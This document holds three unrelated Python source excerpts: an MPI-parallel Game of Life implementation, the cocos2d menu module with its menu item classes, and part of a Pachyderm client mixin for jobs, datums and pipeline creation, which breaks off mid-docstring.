if self.left_rbuf is None:
self.left_rbuf = np.empty((grid.shape[0]-2), np.int)
if self.right_sbuf is None:
self.right_sbuf = np.empty((grid.shape[0]-2), np.int)
if self.right_rbuf is None:
self.right_rbuf = np.empty((grid.shape[0]-2), np.int)
if self.left is not None:
self.left_sbuf[:] = grid[1:-1, 1]
self.reqs += [cart.Irecv(self.left_rbuf, self.left),
cart.Isend(self.left_sbuf, self.left)]
if self.right is not None:
self.right_sbuf[:] = grid[1:-1,-2]
self.reqs += [cart.Irecv(self.right_rbuf, self.right),
cart.Isend(self.right_sbuf, self.right)]
self.buffered_grid = grid
def comm_start_2(self, grid):
cart = self.cart
if self.up is not None:
self.reqs += [cart.Irecv(grid[-1,:], self.up),
cart.Isend(grid[-2,:], self.up)]
if self.down is not None:
self.reqs += [cart.Irecv(grid[0,:], self.down),
cart.Isend(grid[1,:], self.down)]
def comm_end(self):
rank = self.cart.Get_rank()
MPI.Request.Waitall(self.reqs)
if self.buffered_grid is not None:
if self.right is not None:
self.buffered_grid[1:-1,-1] = self.right_rbuf[:]
if self.left is not None:
self.buffered_grid[1:-1, 0] = self.left_rbuf[:]
self.buffered_grid = None
def setup_parallel():
"""Builds and distributes parallel grids"""
comms = Comms()
shape = (64,64)
A = np.random.randint(0,2,shape)
cart = comms.cart
ng = comms.ng
A = cart.bcast(A)
rank = cart.Get_rank()
my_coords = cart.Get_coords(rank)
gridl = [s/n for s,n in zip(shape,ng)]
gs = [int(l*i) for i,l in zip(my_coords, gridl)]
ge = [int(l*(i+1)) for i,l in zip(my_coords, gridl)]
lgs = [l*i-1 if i > 0 else 0 for i, l in zip(my_coords, gridl)]
lge = [l*(i+1)+1 if l*(i+1)+1 <= s else l*(i+1) for i, l, s in zip(my_coords, gridl, shape)]
sg = [slice(s,e) for s,e in zip(gs, ge)]
sl = [slice(s,e) for s,e in zip(lgs, lge)]
grid = A[sg]
l1 = A[sl]
l2 = l1.copy()
return A, l1, l2, sg, grid, comms
def setup_4(A, local_grids, ng):
l_00, l_01, l_10, l_11 = [grid for grid in local_grids]
n_00 = (None, l_01, None, l_10)
n_01 = (l_00, None, None, l_11)
n_10 = (None, l_11, l_00, None)
n_11 = (l_10, None, l_01, None)
shape = A.shape
gridl = [s/n for s,n in zip(shape,ng)]
m0 = gridl[0]
m1 = gridl[1]
g_00 = l_00[:m0,:m1]
l_00[m0,:] = 0
l_00[1:m0-1,m1] = 0
g_01 = l_01[:m0,1:]
l_01[m0,:] = 0
l_01[1:m0-1,0] = 0
g_10 = l_10[1:,:m1]
l_10[0,:] = 0
l_10[1:m0-1,m1] = 0
g_11 = l_11[1:,1:]
l_11[0,:] = 0
l_11[1:m1-1,0] = 0
def comm_all():
communicate(l_00, *n_00[:2] + (None, None))
communicate(l_01, *n_01[:2] + (None, None))
communicate(l_10, *n_10[:2] + (None, None))
communicate(l_11, *n_11[:2] + (None, None))
communicate(l_00, *(None, None) + n_00[2:])
communicate(l_01, *(None, None) + n_01[2:])
communicate(l_10, *(None, None) + n_10[2:])
communicate(l_11, *(None, None) + n_11[2:])
grids = (g_00, g_01, g_10, g_11)
return grids, comm_all
@autojit
def life_step(g, gnew):
"""Given a grid, compute one Game of Life step along the interior of the grid into gnew"""
m,n = g.shape
for i in range(1,m-1):
for j in range(1,n-1):
sum = 0
for ii in range(i-1,i+2):
for jj in range(j-1,j+2):
if ii == i and jj == j:
continue
sum += g[ii,jj]
if sum < 2 or sum > 3:
gnew[i,j] = 0
elif sum == 3:
gnew[i,j] = 1
else:
gnew[i,j] = g[i,j]
|
|
# ----------------------------------------------------------------------------
# cocos2d
# Copyright (c) 2008-2012 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# Copyright (c) 2009-2014 Richard Jones, Claudio Canepa
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# Ideas borrowed from:
# pygext: http://opioid-interactive.com/~shang/projects/pygext/
# pyglet astraea: http://www.pyglet.org
# Grossini's Hell: http://www.pyweek.org/e/Pywiii/
#
"""A `Layer` that implements a simple menu
Menu
====
This module provides a Menu class. Menus can contain regular items
(which trigger a function when selected), toggle items (which toggle a flag when selected),
or entry items (which lets you enter alphanumeric data).
To use a menu in your code, just subclass `Menu` and add the menu to an `Scene` or
another `Layer`.
"""
from __future__ import division, print_function, unicode_literals
from six import string_types
__docformat__ = 'restructuredtext'
import pyglet
from pyglet import font
from pyglet.window import key
from pyglet.gl import *
import pyglet.graphics
from cocos.layer import *
from cocos.director import *
from cocos.cocosnode import *
from cocos.actions import *
from cocos.sprite import Sprite
from cocos import rect
__all__ = [ 'Menu', # menu class
'MenuItem', 'ToggleMenuItem', # menu items classes
'MultipleMenuItem', 'EntryMenuItem', 'ImageMenuItem',
'ColorMenuItem',
'verticalMenuLayout', 'fixedPositionMenuLayout', # Different menu layou functions
'CENTER', 'LEFT', 'RIGHT', 'TOP', 'BOTTOM', # menu aligment
'shake', 'shake_back','zoom_in','zoom_out' # Some useful actions for the menu items
]
#
# Class Menu
#
# Horizontal Align
CENTER = font.Text.CENTER
LEFT = font.Text.LEFT
RIGHT = font.Text.RIGHT
# Vertical Align
TOP = font.Text.TOP
BOTTOM = font.Text.BOTTOM
def verticalMenuLayout (menu):
width, height = director.get_window_size()
fo = font.load(menu.font_item['font_name'], menu.font_item['font_size'])
fo_height = int( (fo.ascent - fo.descent) * 0.9 )
if menu.menu_halign == CENTER:
pos_x = width // 2
elif menu.menu_halign == RIGHT:
pos_x = width - menu.menu_hmargin
elif menu.menu_halign == LEFT:
pos_x = menu.menu_hmargin
else:
raise Exception("Invalid anchor_x value for menu")
for idx,i in enumerate( menu.children):
item = i[1]
if menu.menu_valign == CENTER:
pos_y = (height + (len(menu.children) - 2 * idx)
* fo_height - menu.title_height) * 0.5
elif menu.menu_valign == TOP:
pos_y = (height - ((idx + 0.8) * fo_height )
- menu.title_height - menu.menu_vmargin)
elif menu.menu_valign == BOTTOM:
pos_y = (0 + fo_height * (len(menu.children) - idx) +
menu.menu_vmargin)
item.transform_anchor = (pos_x, pos_y)
item.generateWidgets (pos_x, pos_y, menu.font_item,
menu.font_item_selected)
def fixedPositionMenuLayout (positions):
def fixedMenuLayout(menu):
width, height = director.get_window_size()
for idx,i in enumerate( menu.children):
item = i[1]
pos_x = positions[idx][0]
pos_y = positions[idx][1]
item.transform_anchor = (pos_x, pos_y)
item.generateWidgets (pos_x, pos_y, menu.font_item,
menu.font_item_selected)
return fixedMenuLayout
class Menu(Layer):
"""Abstract base class for menu layers.
Normal usage is:
- create a subclass
- override __init__ to set all style attributes,
and then call `create_menu()`
- Finally you shall add the menu to an `Scene` or another `Layer`
"""
is_event_handler = True #: Receives pyglet events
select_sound = None
activate_sound = None
def __init__( self, title = ''):
super(Menu, self).__init__()
#
# Items and Title
#
self.title = title
self.title_text = None
self.menu_halign = CENTER
self.menu_valign = CENTER
self.menu_hmargin = 2 # Variable margins for left and right alignment
self.menu_vmargin = 2 # Variable margins for top and bottom alignment
#
# Menu default options
# Menus can be customized changing these variables
#
# Title
self.font_title = {
'text':'title',
'font_name':'Arial',
'font_size':56,
'color':(192,192,192,255),
'bold':False,
'italic':False,
'anchor_y':'center',
'anchor_x':'center',
'dpi':96,
'x':0, 'y':0,
}
self.font_item= {
'font_name':'Arial',
'font_size':32,
'bold':False,
'italic':False,
'anchor_y':'center',
'anchor_x':'center',
'color':(192,192,192,255),
'dpi':96,
}
self.font_item_selected = {
'font_name':'Arial',
'font_size':42,
'bold':False,
'italic':False,
'anchor_y':'center',
'anchor_x':'center',
'color':(255,255,255,255),
'dpi':96,
}
self.title_height = 0
self.schedule(lambda dt: None)
def _generate_title( self ):
width, height = director.get_window_size()
self.font_title['x'] = width // 2
self.font_title['text'] = self.title
self.title_label = pyglet.text.Label( **self.font_title )
self.title_label.y = height - self.title_label.content_height //2
fo = font.load( self.font_title['font_name'], self.font_title['font_size'] )
self.title_height = self.title_label.content_height
def _build_items(self, layout_strategy):
self.font_item_selected['anchor_x'] = self.menu_halign
self.font_item_selected['anchor_y'] = 'center'
self.font_item['anchor_x'] = self.menu_halign
self.font_item['anchor_y'] = 'center'
layout_strategy(self)
self.selected_index = 0
self.children[ self.selected_index ][1].is_selected = True
def _select_item(self, new_idx):
if new_idx == self.selected_index:
return
if self.select_sound:
self.select_sound.play()
self.children[ self.selected_index][1].is_selected = False
self.children[ self.selected_index][1].on_unselected()
self.children[ new_idx ][1].is_selected = True
self.children[ new_idx ][1].on_selected()
self.selected_index = new_idx
def _activate_item( self ):
if self.activate_sound:
self.activate_sound.play()
self.children[ self.selected_index][1].on_activated()
self.children[ self.selected_index ][1].on_key_press( key.ENTER, 0 )
def create_menu(self, items, selected_effect=None, unselected_effect=None,
activated_effect=None, layout_strategy=verticalMenuLayout):
"""Creates the menu
The order of the list important since the
first one will be shown first.
Example::
l = []
l.append( MenuItem('Options', self.on_new_game ) )
l.append( MenuItem('Quit', self.on_quit ) )
self.create_menu( l, zoom_in(), zoom_out() )
:Parameters:
`items` : list
list of `BaseMenuItem` that will be part of the `Menu`
`selected_effect` : function
This action will be executed when the `BaseMenuItem` is selected
`unselected_effect` : function
This action will be executed when the `BaseMenuItem` is unselected
`activated_effect` : function
this action will executed when the `BaseMenuItem` is activated (pressing Enter or by clicking on it)
"""
z=0
for i in items:
# calling super.add(). Z is important to mantain order
self.add( i, z=z )
i.activated_effect = activated_effect
i.selected_effect = selected_effect
i.unselected_effect = unselected_effect
i.item_halign = self.menu_halign
i.item_valign = self.menu_valign
z += 1
self._generate_title() # If you generate the title after the items
# the V position of the items can't consider the title's height
if items:
self._build_items(layout_strategy)
def draw( self ):
glPushMatrix()
self.transform()
self.title_label.draw()
glPopMatrix()
def on_text( self, text ):
if text=='\r':
return
return self.children[self.selected_index][1].on_text(text)
def on_key_press(self, symbol, modifiers):
if symbol == key.ESCAPE:
self.on_quit()
return True
elif symbol in (key.ENTER, key.NUM_ENTER):
self._activate_item()
return True
elif symbol in (key.DOWN, key.UP):
if symbol == key.DOWN:
new_idx = self.selected_index + 1
elif symbol == key.UP:
new_idx = self.selected_index - 1
if new_idx < 0:
new_idx = len(self.children) -1
elif new_idx > len(self.children) -1:
new_idx = 0
self._select_item( new_idx )
return True
else:
# send the menu item the rest of the keys
ret = self.children[self.selected_index][1].on_key_press(symbol, modifiers)
# play sound if key was handled
if ret and self.activate_sound:
self.activate_sound.play()
return ret
def on_mouse_release( self, x, y, buttons, modifiers ):
(x,y) = director.get_virtual_coordinates(x,y)
if self.children[ self.selected_index ][1].is_inside_box(x,y):
self._activate_item()
def on_mouse_motion( self, x, y, dx, dy ):
(x,y) = director.get_virtual_coordinates(x,y)
for idx,i in enumerate( self.children):
item = i[1]
if item.is_inside_box( x, y):
self._select_item( idx )
break
class BaseMenuItem( CocosNode ):
"""An abstract menu item. It triggers a function when it is activated"""
selected_effect = None
unselected_effect = None
activated_effect = None
def __init__(self, callback_func, *args, **kwargs):
"""Creates a new menu item
:Parameters:
`callback_func` : function
The callback function
"""
super( BaseMenuItem, self).__init__()
self.callback_func = callback_func
self.callback_args = args
self.callback_kwargs = kwargs
self.is_selected = False
self.item_halign = None
self.item_valign = None
self.item = None
self.item_selected = None
def get_item_width (self):
""" Returns the width of the item.
This method should be implemented by descendents.
:rtype: int
"""
return self.item.width
def get_item_height (self):
""" Returns the width of the item.
This method should be implemented by descendents.
:rtype: int
"""
return self.item.height
def generateWidgets (self, pos_x, pos_y, font_item, font_item_selected):
""" Generate a normal and a selected widget.
This method should be implemented by descendents.
"""
raise NotImplementedError
def get_item_x (self):
""" Return the x position of the item.
This method should be implemented by descendents.
:rtype: int
"""
return self.item.x
def get_item_y (self):
""" Return the y position of the item.
This method should be implemented by descendents.
:rtype: int
"""
return self.item.y
def get_box( self ):
"""Returns the box that contains the menu item.
:rtype: (x1,x2,y1,y2)
"""
width = self.get_item_width ()
height = self.get_item_height ()
if self.item_halign == CENTER:
x_diff = - width / 2
elif self.item_halign == RIGHT:
x_diff = - width
elif self.item_halign == LEFT:
x_diff = 0
else:
raise Exception("Invalid halign: %s" % str(self.item_halign) )
y_diff = - height/ 2
x1 = self.get_item_x() + x_diff
y1 = self.get_item_y() + y_diff
# x1 += self.parent.x
# y1 += self.parent.y
# x2 = x1 + width
# y2 = y1 + height
# return (x1,y1,x2,y2)
return rect.Rect(x1,y1,width,height)
def draw( self ):
raise NotImplementedError
def on_key_press(self, symbol, modifiers):
if symbol == key.ENTER and self.callback_func:
self.callback_func(*self.callback_args, **self.callback_kwargs)
return True
def on_text( self, text ):
return True
def is_inside_box( self, x, y ):
"""Returns whether the point (x,y) is inside the menu item.
:rtype: bool
"""
# (ax,ay,bx,by) = self.get_box()
# if( x >= ax and x <= bx and y >= ay and y <= by ):
# return True
# return False
rect = self.get_box()
p = self.point_to_local( (x,y) )
return rect.contains( p.x, p.y )
def on_selected( self ):
if self.selected_effect:
self.stop()
self.do( self.selected_effect )
def on_unselected( self ):
if self.unselected_effect:
self.stop()
self.do( self.unselected_effect )
def on_activated( self ):
if self.activated_effect:
self.stop()
self.do( self.activated_effect )
class MenuItem (BaseMenuItem):
"""A menu item that shows a label. """
def __init__ (self, label, callback_func, *args, **kwargs):
"""Creates a new menu item
:Parameters:
`label` : string
The label the of the menu item
`callback_func` : function
The callback function
"""
self.label = label
super (MenuItem, self).__init__(callback_func, *args, **kwargs)
def get_item_width (self):
return self.item.content_width
def get_item_height (self):
return self.item.content_height
def generateWidgets (self, pos_x, pos_y, font_item, font_item_selected):
font_item['x'] = int(pos_x)
font_item['y'] = int(pos_y)
font_item['text'] = self.label
self.item = pyglet.text.Label(**font_item )
font_item_selected['x'] = int(pos_x)
font_item_selected['y'] = int(pos_y)
font_item_selected['text'] = self.label
self.item_selected = pyglet.text.Label( **font_item_selected )
def draw( self ):
glPushMatrix()
self.transform()
if self.is_selected:
self.item_selected.draw()
else:
self.item.draw()
glPopMatrix()
class ImageMenuItem (BaseMenuItem):
""" A menu item that shows a selectable Image """
def __init__ (self, image, callback_func, *args, **kwargs):
if isinstance(image, string_types):
image = pyglet.resource.image(image)
self.image = image
super (ImageMenuItem, self).__init__(callback_func, *args, **kwargs)
def generateWidgets (self, pos_x, pos_y, font_item, font_item_selected):
anchors = {'left': 0, 'center': 0.5, 'right': 1, 'top': 1, 'bottom': 0}
anchor=(anchors[font_item['anchor_x']] * self.image.width,
anchors[font_item['anchor_y']] * self.image.height)
self.item = Sprite(self.image, anchor=anchor, opacity=255,
color=font_item['color'][:3])
self.item.scale = font_item['font_size'] / float(self.item.height )
self.item.position = int(pos_x), int(pos_y)
self.selected_item = Sprite(self.image, anchor=anchor,
color=font_item_selected['color'][:3])
self.selected_item.scale = (font_item_selected['font_size'] /
float(self.selected_item.height))
self.selected_item.position = int(pos_x), int(pos_y)
def draw (self):
glPushMatrix()
self.transform()
if self.is_selected:
self.selected_item.draw()
else:
self.item.draw()
glPopMatrix()
class MultipleMenuItem( MenuItem ):
"""A menu item for switching between multiple values.
Example::
self.volumes = ['Mute','10','20','30','40','50','60','70','80','90','100']
items.append( MultipleMenuItem(
'SFX volume: ',
self.on_sfx_volume,
self.volumes,
8 ) )
"""
def __init__(self, label, callback_func, items, default_item=0):
"""Creates a Multiple Menu Item
:Parameters:
`label` : string
Item's label
`callback_func` : function
Callback function
`items` : list
List of strings containing the values
`default_item` : integer
Default item of the list. It is an index of the list. Default: 0
"""
self.my_label = label
self.items = items
self.idx = default_item
if self.idx < 0 or self.idx >= len(self.items):
raise Exception("Index out of bounds")
super( MultipleMenuItem, self).__init__( self._get_label(), callback_func )
def _get_label(self):
return self.my_label+self.items[self.idx]
def on_key_press(self, symbol, modifiers):
if symbol == key.LEFT:
self.idx = max(0, self.idx-1)
elif symbol in (key.RIGHT, key.ENTER):
self.idx = min(len(self.items)-1, self.idx+1)
if symbol in (key.LEFT, key.RIGHT, key.ENTER):
self.item.text = self._get_label()
self.item_selected.text = self._get_label()
self.callback_func( self.idx )
return True
class ToggleMenuItem( MultipleMenuItem ):
'''A menu item for a boolean toggle option.
Example::
items.append( ToggleMenuItem('Show FPS:', self.on_show_fps, director.show_FPS) )
'''
def __init__(self, label, callback_func, value=False ):
"""Creates a Toggle Menu Item
:Parameters:
`label` : string
Item's label
`callback_func` : function
Callback function
`value` : bool
Default value of the item: False is 'OFF', True is 'ON'. Default:False
"""
super(ToggleMenuItem, self).__init__( label, callback_func, ['OFF','ON'], int(value) )
def on_key_press( self, symbol, mod ):
if symbol in (key.LEFT, key.RIGHT, key.ENTER):
self.idx += 1
if self.idx > 1:
self.idx = 0
self.item.text = self._get_label()
self.item_selected.text = self._get_label()
self.callback_func( int(self.idx) )
return True
class EntryMenuItem(MenuItem):
"""A menu item for entering a value.
When selected, ``self.value`` is toggled, the callback function is
called with ``self.value`` as argument."""
value = property(lambda self: u''.join(self._value),
lambda self, v: setattr(self, '_value', list(v)))
def __init__(self, label, callback_func, value, max_length=0 ):
"""Creates an Entry Menu Item
:Parameters:
`label` : string
Item's label
`callback_func` : function
Callback function taking one argument.
`value` : String
Default value: any string
`max_length` : integer
Maximum value length (Defaults to 0 for unbound length)
"""
self._value = list(value)
self._label = label
super(EntryMenuItem, self).__init__( "%s %s" %(label,value), callback_func )
self.max_length = max_length
def on_text( self, text ):
if self.max_length == 0 or len(self._value) < self.max_length:
self._value.append(text)
self._calculate_value()
return True
def on_key_press(self, symbol, modifiers):
if symbol == key.BACKSPACE:
try:
self._value.pop()
except IndexError:
pass
self._calculate_value()
return True
def _calculate_value( self ):
self.callback_func(self.value)
new_text = u"%s %s" % (self._label, self.value)
self.item.text = new_text
self.item_selected.text = new_text
class ColorMenuItem( MenuItem ):
"""A menu item for selecting a color.
Example::
colors = [(255, 255, 255), (100, 200, 100), (200, 50, 50)]
items.append( ColorMenuItem(
'Jacket:',
self.on_jacket_color,
colors ))
"""
def __init__(self, label, callback_func, items, default_item=0):
"""Creates a Color Menu Item
:Parameters:
`label` : string
Item's label
`callback_func` : function
Callback function
`items` : list
List of thre-element tuples describing the color choices
`default_item` : integer
Default item of the list. It is an index of the list. Default: 0
"""
self.my_label = label
self.items = items
self.idx = default_item
if self.idx < 0 or self.idx >= len(self.items):
raise Exception("Index out of bounds")
super( ColorMenuItem, self).__init__( self._get_label(), callback_func )
def _get_label(self):
return self.my_label + " "
def on_key_press(self, symbol, modifiers):
if symbol == key.LEFT:
self.idx = max(0, self.idx-1)
elif symbol in (key.RIGHT, key.ENTER):
self.idx = min(len(self.items)-1, self.idx+1)
if symbol in (key.LEFT, key.RIGHT, key.ENTER):
self.item.text = self._get_label()
self.item_selected.text = self._get_label()
self.callback_func( self.idx )
return True
def generateWidgets (self, pos_x, pos_y, font_item, font_item_selected):
font_item['x'] = int(pos_x)
font_item['y'] = int(pos_y)
font_item['text'] = self.my_label
self.item = pyglet.text.Label(**font_item )
self.item.labelWidth=self.item.content_width
self.item.text = self.label
font_item_selected['x'] = int(pos_x)
font_item_selected['y'] = int(pos_y)
font_item_selected['text'] = self.my_label
self.item_selected = pyglet.text.Label( **font_item_selected )
self.item_selected.labelWidth=self.item_selected.content_width
self.item_selected.text = self.label
def draw(self, *args, **kwargs):
super(ColorMenuItem, self).draw()
glPushMatrix()
self.transform()
if self.is_selected:
item = self.item_selected
else:
item = self.item
x1 = int(item._get_left() + item.labelWidth * 1.05)
y1 = int(item.y - item.content_height // 2)
y2 = int(item.y + item.content_height // 3)
x2 = int(x1 + (y2 - y1) * 2)
pyglet.graphics.draw(4, pyglet.graphics.GL_QUADS,
('v2f', (x1, y1, x1, y2, x2, y2, x2, y1)),
('c3B', self.items[self.idx] * 4))
glPopMatrix()
def shake():
'''Predefined action that performs a slight rotation and then goes back to the original rotation
position.
'''
angle = 5
duration = 0.05
rot = Accelerate(RotateBy( angle, duration ), 2)
rot2 = Accelerate(RotateBy( -angle*2, duration), 2)
return rot + (rot2 + Reverse(rot2)) * 2 + Reverse(rot)
def shake_back():
'''Predefined action that rotates to 0 degrees in 0.1 seconds'''
return RotateTo(0,0.1)
def zoom_in():
'''Predefined action that scales to 1.5 factor in 0.2 seconds'''
return ScaleTo( 1.5, duration=0.2 )
def zoom_out():
'''Predefined action that scales to 1.0 factor in 0.2 seconds'''
return ScaleTo( 1.0, duration=0.2 )
|
|
import json
import base64
from typing import Dict, Iterator, List, Union
from python_pachyderm.pfs import commit_from, SubcommitType
from python_pachyderm.service import Service, pps_proto, pfs_proto
from google.protobuf import empty_pb2, duration_pb2
class PPSMixin:
"""A mixin for pps-related functionality."""
def inspect_job(
self,
job_id: str,
pipeline_name: str = None,
wait: bool = False,
details: bool = False,
) -> Iterator[pps_proto.JobInfo]:
"""Inspects a job.
Parameters
----------
job_id : str
The ID of the job.
pipeline_name : str, optional
The name of a pipeline.
wait : bool, optional
If true, wait until the job completes.
details : bool, optional
If true, return worker details.
Returns
-------
Iterator[pps_proto.JobInfo]
An iterator of protobuf objects that contain info on a subjob
(jobs at the pipeline-level).
Examples
--------
>>> # Look at all subjobs in a job
>>> subjobs = list(client.inspect_job("467c580611234cdb8cc9758c7aa96087"))
...
>>> # Look at single subjob (job at the pipeline-level)
>>> subjob = list(client.inspect_job("467c580611234cdb8cc9758c7aa96087", "foo"))[0]
.. # noqa: W505
"""
if pipeline_name is not None:
return iter(
[
self._req(
Service.PPS,
"InspectJob",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
wait=wait,
details=details,
)
]
)
else:
return self._req(
Service.PPS,
"InspectJobSet",
job_set=pps_proto.JobSet(id=job_id),
wait=wait,
details=details,
)
def list_job(
self,
pipeline_name: str = None,
input_commit: SubcommitType = None,
history: int = 0,
details: bool = False,
jqFilter: str = None,
) -> Union[Iterator[pps_proto.JobInfo], Iterator[pps_proto.JobSetInfo]]:
"""Lists jobs.
Parameters
----------
pipeline_name : str, optional
The name of a pipeline. If set, returns subjobs (job at the
pipeline-level) only from this pipeline.
input_commit : SubcommitType, optional
A commit or list of commits from the input repo to filter jobs on.
Only impacts returned results if `pipeline_name` is specified.
history : int, optional
Indicates to return jobs from historical versions of
`pipeline_name`. Semantics are:
- 0: Return jobs from the current version of `pipeline_name`
- 1: Return the above and jobs from the next most recent version
- 2: etc.
- -1: Return jobs from all historical versions of `pipeline_name`
details : bool, optional
If true, return pipeline details for `pipeline_name`. Leaving this
``None`` (or ``False``) can make the call significantly faster in
clusters with a large number of pipelines and jobs. Note that if
`input_commit` is valid, this field is coerced to `True`.
jqFilter : str, optional
A ``jq`` filter that can filter the list of jobs returned, only if
`pipeline_name` is provided.
Returns
-------
Union[Iterator[pps_proto.JobInfo], Iterator[pps_proto.JobSetInfo]]
An iterator of protobuf objects that either contain info on a
subjob (job at the pipeline-level), if `pipeline_name` was
specified, or a job, if `pipeline_name` wasn't specified.
Examples
--------
>>> # List all jobs
>>> jobs = list(client.list_job())
...
>>> # List all jobs at a pipeline-level
>>> subjobs = list(client.list_job("foo"))
.. # noqa: W505
"""
if pipeline_name is not None:
if isinstance(input_commit, list):
input_commit = [commit_from(ic) for ic in input_commit]
elif input_commit is not None:
input_commit = [commit_from(input_commit)]
return self._req(
Service.PPS,
"ListJob",
pipeline=pps_proto.Pipeline(name=pipeline_name),
input_commit=input_commit,
history=history,
details=details,
jqFilter=jqFilter,
)
else:
return self._req(
Service.PPS,
"ListJobSet",
details=details,
)
def delete_job(self, job_id: str, pipeline_name: str) -> None:
"""Deletes a subjob (job at the pipeline-level).
Parameters
----------
job_id : str
The ID of the job.
pipeline_name : str
The name of the pipeline.
"""
self._req(
Service.PPS,
"DeleteJob",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
)
def stop_job(self, job_id: str, pipeline_name: str, reason: str = None) -> None:
"""Stops a subjob (job at the pipeline-level).
Parameters
----------
job_id : str
The ID of the job.
pipeline_name : str
The name of the pipeline.
reason : str, optional
A reason for stopping the job.
"""
self._req(
Service.PPS,
"StopJob",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
reason=reason,
)
def inspect_datum(
self, pipeline_name: str, job_id: str, datum_id: str
) -> pps_proto.DatumInfo:
"""Inspects a datum.
Parameters
----------
pipeline_name : str
The name of the pipeline.
job_id : str
The ID of the job.
datum_id : str
The ID of the datum.
Returns
-------
pps_proto.DatumInfo
A protobuf object with info on the datum.
"""
return self._req(
Service.PPS,
"InspectDatum",
datum=pps_proto.Datum(
id=datum_id,
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
),
)
def list_datum(
self,
pipeline_name: str = None,
job_id: str = None,
input: pps_proto.Input = None,
) -> Iterator[pps_proto.DatumInfo]:
"""Lists datums. Exactly one of (`pipeline_name`, `job_id`) (real) or
`input` (hypothetical) must be set.
Parameters
----------
pipeline_name : str, optional
The name of the pipeline.
job_id : str, optional
The ID of a job.
input : pps_proto.Input, optional
A protobuf object that filters the datums returned. The datums
listed are ones that would be run if a pipeline was created with
the provided input.
Returns
-------
Iterator[pps_proto.DatumInfo]
An iterator of protobuf objects that contain info on a datum.
Examples
--------
>>> # See hypothetical datums with specified input cross
>>> datums = list(client.list_datum(input=pps_proto.Input(
... pfs=pps_proto.PFSInput(repo="foo", branch="master", glob="/*"),
... cross=[
... pps_proto.Input(pfs=pps_proto.PFSInput(repo="bar", branch="master", glob="/")),
... pps_proto.Input(pfs=pps_proto.PFSInput(repo="baz", branch="master", glob="/*/*")),
... ]
... )))
.. # noqa: W505
"""
req = pps_proto.ListDatumRequest()
if pipeline_name is not None and job_id is not None:
req.job.CopyFrom(
pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
)
)
else:
req.input.CopyFrom(input)
return self._req(Service.PPS, "ListDatum", req=req)
def restart_datum(
self, pipeline_name: str, job_id: str, data_filters: List[str] = None
) -> None:
"""Restarts a datum.
Parameters
----------
pipeline_name : str
The name of the pipeline.
job_id : str
The ID of the job.
data_filters : List[str], optional
A list of paths or hashes of datums that filter which datums are
restarted.
"""
self._req(
Service.PPS,
"RestartDatum",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
data_filters=data_filters,
)
def create_pipeline(
self,
pipeline_name: str,
transform: pps_proto.Transform,
parallelism_spec: pps_proto.ParallelismSpec = None,
egress: pps_proto.Egress = None,
reprocess_spec: str = None,
update: bool = False,
output_branch_name: str = None,
s3_out: bool = False,
resource_requests: pps_proto.ResourceSpec = None,
resource_limits: pps_proto.ResourceSpec = None,
sidecar_resource_limits: pps_proto.ResourceSpec = None,
input: pps_proto.Input = None,
description: str = None,
reprocess: bool = False,
service: pps_proto.Service = None,
datum_set_spec: pps_proto.DatumSetSpec = None,
datum_timeout: duration_pb2.Duration = None,
job_timeout: duration_pb2.Duration = None,
salt: str = None,
datum_tries: int = 3,
scheduling_spec: pps_proto.SchedulingSpec = None,
pod_patch: str = None,
spout: pps_proto.Spout = None,
spec_commit: pfs_proto.Commit = None,
metadata: pps_proto.Metadata = None,
autoscaling: bool = False,
) -> None:
"""Creates a pipeline.
For info on the params, please refer to the pipeline spec document:
http://docs.pachyderm.io/en/latest/reference/pipeline_spec.html
Parameters
----------
pipeline_name : str
The pipeline name.
transform : pps_proto.Transform
The image and commands run during pipeline execution.
parallelism_spec : pps_proto.ParallelismSpec, optional
Specifies how the pipeline is parallelized.
egress : pps_proto.Egress, optional
An external data store to publish the results of the pipeline to.
reprocess_spec : str, optional
Specifies how to handle already-processed datums.
update : bool, optional
If true, updates the existing pipeline with new args.
output_branch_name : str, optional
The branch name to output results on.
s3_out : bool, optional
If true, the output repo is exposed as an S3 gateway bucket.
resource_requests : pps_proto.ResourceSpec, optional
The amount of resources that the pipeline workers will consume.
resource_limits: pps_proto.ResourceSpec, optional
The upper threshold of allowed resources a given worker can
consume. If a worker exceeds this value, it will be evicted.
sidecar_resource_limits : pps_proto.ResourceSpec, optional
The upper threshold of resources allocated to the sidecar
containers.
input : pps_proto.Input, optional
The input repos to the pipeline. Commits to these repos will
automatically trigger the pipeline to create new jobs to
process them.
description : str, optional
A description of the pipeline.
reprocess : bool, optional
If true, forces the pipeline to reprocess all datums. Only has
